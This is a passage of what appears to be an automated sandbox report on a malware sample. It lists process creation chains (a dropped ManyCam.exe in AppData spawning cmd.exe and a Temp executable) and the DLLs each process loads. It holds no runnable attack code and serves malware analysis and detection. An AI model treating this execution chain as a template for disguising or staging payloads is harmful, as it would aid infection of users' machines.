                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: cximagecrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: cxcore099.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: cv099.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: highgui099.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: crashrpt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: opengl32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: glu32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: avifil32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippopencv099.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippopencv097.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippcv-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippcv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippcv20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippi-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippi20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ipps-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ipps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ipps20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippvm-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippvm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippvm20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippcc-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippcc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ippcc20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: mkl_p4.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: mkl_p3.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: mkl_def.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: pcaui.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cximagecrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cxcore099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cv099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: highgui099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: crashrpt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: opengl32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: glu32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: glu32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: avifil32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippopencv099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippopencv097.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcv-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcv20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippi-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippi20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ipps-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ipps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ipps20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippvm-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippvm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippvm20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcc-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcc20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: mkl_p4.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: mkl_p3.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: mkl_def.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: pcaui.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cximagecrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cxcore099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cv099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: highgui099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: crashrpt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: opengl32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: glu32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: glu32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: avifil32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippopencv099.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippopencv097.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcv-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcv20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippi-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippi20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ipps-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ipps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ipps20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippvm-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippvm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippvm20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcc-5.1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: ippcc20.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: mkl_p4.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: mkl_p3.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: mkl_def.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: pcaui.dllJump to behavior
                  Source: C:\Windows\System32\pcaui.exeSection loaded: dui70.dllJump to behavior
